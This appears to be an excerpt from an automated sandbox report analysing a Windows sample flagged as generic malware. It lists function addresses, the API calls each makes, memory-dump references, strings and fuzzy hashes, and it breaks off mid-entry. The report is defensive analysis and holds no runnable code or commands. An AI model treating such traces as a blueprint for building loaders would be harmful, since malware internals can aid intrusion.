                                                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034C2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FilePointer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 973152223-0
                                                                                                                        • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                                                        • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                                                                                        • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                                                        • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                                                                                        Function 004044C2 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,00404299), ref: 004044CC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CallbackDispatcherUser
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2492992576-0
                                                                                                                        • Opcode ID: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                                                                                                                        • Instruction ID: bf70c606a766814dc6d2ff6c1013b69bc1ca18b78975ad7518874070628387b3
                                                                                                                        • Opcode Fuzzy Hash: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                                                                                                                        • Instruction Fuzzy Hash: BEA00176544900ABCA16AB50EF0980ABB72BBA8701B528879A285510388B725921FB19
                                                                                                                        Function 70592B98 Relevance: 1.4, APIs: 1, Instructions: 143memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • VirtualAlloc.KERNELBASE(00000000), ref: 70592C57
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72590322272.0000000070591000.00000020.00000001.01000000.00000004.sdmp, Offset: 70590000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72590238197.0000000070590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72590417653.0000000070594000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72590494752.0000000070596000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_70590000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4275171209-0
                                                                                                                        • Opcode ID: 84c9f0e6a67956cfa789d798b7291a165af4703e67c533edbd0c1d539944a360
                                                                                                                        • Instruction ID: 15166a04c766115a8265f1d742708146abd2e789e2a74ffec48e6a1950a3b14a
                                                                                                                        • Opcode Fuzzy Hash: 84c9f0e6a67956cfa789d798b7291a165af4703e67c533edbd0c1d539944a360
                                                                                                                        • Instruction Fuzzy Hash: AD41A273520204EFDB11DF66DD4EB4D3BB5EB94314F328827E505D6120D638A8A18B99
                                                                                                                        Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3472027048-0
                                                                                                                        • Opcode ID: 5065bf49ec89ca03d4d81e0e626b625f4b0a8bbe3ca9100aab93803b3529547f
                                                                                                                        • Instruction ID: a775f6773ee6fca20605c15f6de2f930d7ecc582f877687dc3caa15317c5c1fc
                                                                                                                        • Opcode Fuzzy Hash: 5065bf49ec89ca03d4d81e0e626b625f4b0a8bbe3ca9100aab93803b3529547f
                                                                                                                        • Instruction Fuzzy Hash: 8ED05E73A142008BD710EBB8BE854AF73B8EA403193204C3BD102E1191E6788902461C
                                                                                                                        Function 705912BB Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GlobalAlloc.KERNELBASE(00000040,?,705912DB,?,7059137F,00000019,705911CA,-000000A0), ref: 705912C5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72590322272.0000000070591000.00000020.00000001.01000000.00000004.sdmp, Offset: 70590000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72590238197.0000000070590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72590417653.0000000070594000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72590494752.0000000070596000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_70590000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocGlobal
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3761449716-0
                                                                                                                        • Opcode ID: 8b400839033e0eacd90376acb2bfbb9ed8fc756249a85de7d36a134a6411a83c
                                                                                                                        • Instruction ID: 1977803c7846eb972a25bdd45f74221532b39b6d407b055fe7c3a8374b061861
                                                                                                                        • Opcode Fuzzy Hash: 8b400839033e0eacd90376acb2bfbb9ed8fc756249a85de7d36a134a6411a83c
                                                                                                                        • Instruction Fuzzy Hash: 44B012726100009FEE008B16DC0EF343354F710304F250001B700E5050D2604C24CA24

                                                                                                                        Non-executed Functions

                                                                                                                        Function 00404991 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,000003FB), ref: 004049E0
                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00404A0A
                                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00404ABB
                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404AC6
                                                                                                                        • lstrcmpiW.KERNEL32(Call,00422F08,00000000,?,?), ref: 00404AF8
                                                                                                                        • lstrcatW.KERNEL32(?,Call), ref: 00404B04
                                                                                                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B16
                                                                                                                          • Part of subcall function 00405B65: GetDlgItemTextW.USER32(?,?,00000400,00404B4D), ref: 00405B78
                                                                                                                          • Part of subcall function 004067CF: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe",76343420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406832
                                                                                                                          • Part of subcall function 004067CF: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406841
                                                                                                                          • Part of subcall function 004067CF: CharNextW.USER32(?,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe",76343420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406846
                                                                                                                          • Part of subcall function 004067CF: CharPrevW.USER32(?,?,76343420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406859
                                                                                                                        • GetDiskFreeSpaceW.KERNEL32(00420ED8,?,?,0000040F,?,00420ED8,00420ED8,?,?,00420ED8,?,?,000003FB,?), ref: 00404BD9
                                                                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BF4
                                                                                                                          • Part of subcall function 00404D4D: lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DEE
                                                                                                                          • Part of subcall function 00404D4D: wsprintfW.USER32 ref: 00404DF7
                                                                                                                          • Part of subcall function 00404D4D: SetDlgItemTextW.USER32(?,00422F08), ref: 00404E0A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                        • String ID: A$C:\Users\user\polaritets$Call
                                                                                                                        • API String ID: 2624150263-2269717157
                                                                                                                        • Opcode ID: 2c04f043fab078114f436bc2b0f460e04cb31fe4a389aa85165ae8fc382e2e95
                                                                                                                        • Instruction ID: 030197d704291a410dcd06cfc4277a043b64cd4f667f0077e3e502e998d69d3f
                                                                                                                        • Opcode Fuzzy Hash: 2c04f043fab078114f436bc2b0f460e04cb31fe4a389aa85165ae8fc382e2e95
                                                                                                                        • Instruction Fuzzy Hash: CBA1A0B1900208ABDB11AFA5DD45AAF77B8EF84314F11803BF611B62D1D77C9A418B6D
                                                                                                                        Function 70591BFF Relevance: 20.1, APIs: 13, Instructions: 597stringlibrarymemoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 705912BB: GlobalAlloc.KERNELBASE(00000040,?,705912DB,?,7059137F,00000019,705911CA,-000000A0), ref: 705912C5
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 70591D2D
                                                                                                                        • lstrcpyW.KERNEL32(00000008,?), ref: 70591D75
                                                                                                                        • lstrcpyW.KERNEL32(00000808,?), ref: 70591D7F
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 70591D92
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 70591E74
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 70591E79
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 70591E7E
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 70592068
                                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 70592222
                                                                                                                        • GetModuleHandleW.KERNEL32(00000008), ref: 705922A1
                                                                                                                        • LoadLibraryW.KERNEL32(00000008), ref: 705922B2
                                                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 7059230C
                                                                                                                        • lstrlenW.KERNEL32(00000808), ref: 70592326
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72590322272.0000000070591000.00000020.00000001.01000000.00000004.sdmp, Offset: 70590000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72590238197.0000000070590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72590417653.0000000070594000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72590494752.0000000070596000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_70590000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 245916457-0
                                                                                                                        • Opcode ID: 3abef10b389d20a8a981dd4adc37c8a859be543553b77a4c7a742187bdb7cfdd
                                                                                                                        • Instruction ID: 305f9b7bc9ecb5f5f70fe0a14d530df7961e64b8f3598fb77444dbc806fdd2b4
                                                                                                                        • Opcode Fuzzy Hash: 3abef10b389d20a8a981dd4adc37c8a859be543553b77a4c7a742187bdb7cfdd
                                                                                                                        • Instruction Fuzzy Hash: 6522CD71D2421ADECB11DFA4C9846EEBFB8FB04305F21492ED1A7E6280D7749A81DB5C
                                                                                                                        Function 004021AF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CoCreateInstance.OLE32(004084DC,?,?,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\polaritets, xrefs: 0040226E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateInstance
                                                                                                                        • String ID: C:\Users\user\polaritets
                                                                                                                        • API String ID: 542301482-1397053051
                                                                                                                        • Opcode ID: 18b8905a52bb68317a5b1bf06e2d786d8dd953d3db2333650e4a3939e0f89523
                                                                                                                        • Instruction ID: 8307c529eb9feefa1617cd4f78f27985085e4fae61a1ffd37fb0b3adda41be3b
                                                                                                                        • Opcode Fuzzy Hash: 18b8905a52bb68317a5b1bf06e2d786d8dd953d3db2333650e4a3939e0f89523
                                                                                                                        • Instruction Fuzzy Hash: 00410575A00209AFCB40DFE4C989EAD7BB5FF48308B20456EF505EB2D1DB799982CB54
                                                                                                                        Function 00402910 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFindFirst
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1974802433-0
                                                                                                                        • Opcode ID: 6ffcda492f923abc76daec6159b81a3f5593eca79e3a3c3abc80d0637868bc28
                                                                                                                        • Instruction ID: a06f58704ac02dcae893024ea8a23b5ac4ca5f5a8623c8e138aed3c50dac2e18
                                                                                                                        • Opcode Fuzzy Hash: 6ffcda492f923abc76daec6159b81a3f5593eca79e3a3c3abc80d0637868bc28
                                                                                                                        • Instruction Fuzzy Hash: 44F05E71A04104AAD711EBE4E9499AEB378EF14314F60057BE101F21D0DBB84D019B2A
                                                                                                                        Function 00404F0D Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404F25
                                                                                                                        • GetDlgItem.USER32(?,00000408), ref: 00404F30
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F7A
                                                                                                                        • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F91
                                                                                                                        • SetWindowLongW.USER32(?,000000FC,0040551A), ref: 00404FAA
                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FBE
                                                                                                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FD0
                                                                                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404FE6
                                                                                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FF2
                                                                                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405004
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00405007
                                                                                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405032
                                                                                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040503E
                                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D9
                                                                                                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405109
                                                                                                                          • Part of subcall function 004044D5: SendMessageW.USER32(00000028,?,?,00404300), ref: 004044E3
                                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040511D
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0040514B
                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405159
                                                                                                                        • ShowWindow.USER32(?,00000005), ref: 00405169
                                                                                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405264
                                                                                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C9
                                                                                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052DE
                                                                                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405302
                                                                                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405322
                                                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00405337
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00405347
                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053C0
                                                                                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00405469
                                                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405478
                                                                                                                        • InvalidateRect.USER32(?,00000000,?), ref: 004054A3
                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 004054F1
                                                                                                                        • GetDlgItem.USER32(?,000003FE), ref: 004054FC
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00405503
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                        • String ID: $M$N
                                                                                                                        • API String ID: 2564846305-813528018
                                                                                                                        • Opcode ID: 963d0e2195837636cb6f5b073c234fd9fc9862b141633064f8114fc5dd327728
                                                                                                                        • Instruction ID: 467e9106b9ab4b1e9b2d04e68362d71007c986f05034cc4a0cb7dcf353c6e141
                                                                                                                        • Opcode Fuzzy Hash: 963d0e2195837636cb6f5b073c234fd9fc9862b141633064f8114fc5dd327728
                                                                                                                        • Instruction Fuzzy Hash: 16029B70A00609EFDB20DF95DD45AAF7BB5FB44314F10817AE610BA2E1D7B98A42CF58
                                                                                                                        Function 0040465F Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CheckDlgButton.USER32(?,-0000040A,?), ref: 004046FD
                                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404711
                                                                                                                        • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 0040472E
                                                                                                                        • GetSysColor.USER32(?), ref: 0040473F
                                                                                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040474D
                                                                                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040475B
                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00404760
                                                                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040476D
                                                                                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404782
                                                                                                                        • GetDlgItem.USER32(?,0000040A), ref: 004047DB
                                                                                                                        • SendMessageW.USER32(00000000), ref: 004047E2
                                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 0040480D
                                                                                                                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404850
                                                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 0040485E
                                                                                                                        • SetCursor.USER32(00000000), ref: 00404861
                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0040487A
                                                                                                                        • SetCursor.USER32(00000000), ref: 0040487D
                                                                                                                        • SendMessageW.USER32(00000111,?,00000000), ref: 004048AC
                                                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048BE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                        • String ID: Call$N
                                                                                                                        • API String ID: 3103080414-3438112850
                                                                                                                        • Opcode ID: d465d3d5382bb59059b47d3503e7a252332af71f120e52871dcbc052c6d80ab7
                                                                                                                        • Instruction ID: fa786ba7610ecb1ae21ae2169d8ef808fc0b2da043ab7544d4c43deaa2774949
                                                                                                                        • Opcode Fuzzy Hash: d465d3d5382bb59059b47d3503e7a252332af71f120e52871dcbc052c6d80ab7
